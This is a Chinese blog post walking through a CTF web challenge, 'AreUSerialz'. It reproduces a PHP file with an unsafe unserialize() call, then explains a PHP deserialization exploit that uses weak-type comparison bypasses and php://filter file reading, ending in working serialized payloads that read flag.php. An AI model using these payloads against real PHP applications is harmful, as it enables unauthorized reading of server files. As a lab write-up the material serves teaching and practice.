[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-01-21 11:13:41 发布

Kevin_xiao~

最新推荐文章于 2024-01-21 11:13:41 发布

阅读量104

点赞数

分类专栏： CTF题目(web) 文章标签：安全

本文链接：https://blog.csdn.net/qq_52907838/article/details/117299113

版权

CTF题目(web) 专栏收录该内容

52 篇文章 2 订阅

订阅专栏

<?php
include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

看到这么长的代码先不要慌，先看最后：

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

先通过get方式获得字符串str，然后通过is_valid函数判断，就来看看is_valid函数：

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

ord函数是返回字符的 ASCII码，通过循环的方式确保str的每个字符的ASCII码值在32至125之间，满足就对str进行反序列化，检测不通过直接报错。

然后我们看一下 FileHandler的类，和 魔法方法：

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

__construct() 魔术方法在每次创建新对象时调用，我们传入对象时已经创建好，所以不需要调用 __construct() 方法，而 __destruct 魔术方法在对象销毁时执行，因此不需要管 __construct()，只需管 __destruct()。

如果op强类型等于2就会将其覆盖为1，然后将content置空，并调用process()函数，接着看process()函数：

public function process() {
    if($this->op == "1") {
        $this->write();
    } else if($this->op == "2") {
        $res = $this->read();
        $this->output($res);
    } else {
        $this->output("Bad Hacker!");
    }
}

如果op弱等于1，就调用write()函数，若op弱等于2就调用read()函数并用output()函数处理read函数处理后的值，若op不等于2和3，就直接用output输出Bad Hacker! 再看看 write ()函数：

function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

在存在filename，content变量的情况下，如果content变量长度大于100就输出 Too long!如果用 file_put_contents函数成功打开fliename和content就输出 Successful!否则输出 Failed!（此处看到 file_put_contents函数就能想到用php伪协议绕过它 ）

private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

同样若filename存在就以 file_get_contents函数打开（也能用伪协议）。

__destruct()魔术方法中，op==="2"是强比较，而process()使用的是弱比较op=="2"，可以通过弱类型绕过。

绕过方法：op=2，这里的2是整数int类型，op=2时，op==="2"为false，op=="2"为true，就能顺利执行到read()函数。

read方法中，使用 file_get_contents() 函数来读取属性filename路径的文件。根据源码开头有包含： include( "flag.php" )，所以此处能 使用PHP伪协议读取flag.php

构建序列化内容：

<?php
class FileHandler {
    protected $op = 2;
    protected $filename = 'php://filter/read=convert.base64-encode/resource=flag.php';
    protected $content;
}
echo serialize(new FileHandler);
?>

得到：

O:11:"FileHandler":3:{s:5:" * op";i:2;s:11:" * filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:10:" * content";N;}

传入后发现显示： [Result]: Bad Hacker!

为什么呢？

原因是 is_valid()函数规定字符的ASCII码必须是32-125，而protected属性在序列化后会出现不可见字符\00*\00，转化为ASCII码不符合要求。

绕过方法：

①PHP7.1以上版本对属性类型不敏感，public属性序列化不会出现不可见字符，可以用public属性来绕过（可以在response headers中的x-powered-by中看php的版本）

②private属性序列化的时候会引入两个\x00，注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到，甚至导致截断，但是url编码后就可以看得很清楚了。同理，protected属性会引入\x00*\x00。此时，为了更加方便进行反序列化Payload的传输与显示，我们可以在序列化内容中用大写S表示字符串，此时这个字符串就支持将后面的字符串用16进制表示。

最后将上面的protected改为public，得到：

 O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

在源码里得到flag

Kevin_xiao~

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
[网鼎杯 2020 青龙组]AreUSerialz

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel.
复制链接

扫一扫